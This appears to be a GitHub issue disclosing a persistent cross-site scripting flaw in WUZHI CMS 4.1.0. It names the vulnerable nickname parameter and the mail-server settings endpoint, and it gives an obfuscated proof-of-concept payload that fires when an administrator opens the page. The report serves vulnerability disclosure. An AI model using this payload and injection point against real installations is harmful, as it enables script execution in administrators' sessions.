A xss vulnerability was discovered in WUZHI CMS 4.1.0
There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the form[nickname] parameter post to the /wuzhicms/www/index.php?m=core&f=set&v=sendmail&_su=wuzhicms&_menuid=24
When administrator access - system settings - mail server .then XSS vulnerability is triggered successfully
POCxss payload: <details/open/ontoggle=eval(String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(50)+String.fromCharCode(41))>Vulnerability trigger pointwhen administrator access - system settings - mail server .then XSS vulnerability is triggeredThe text was updated successfully, but these errors were encountered: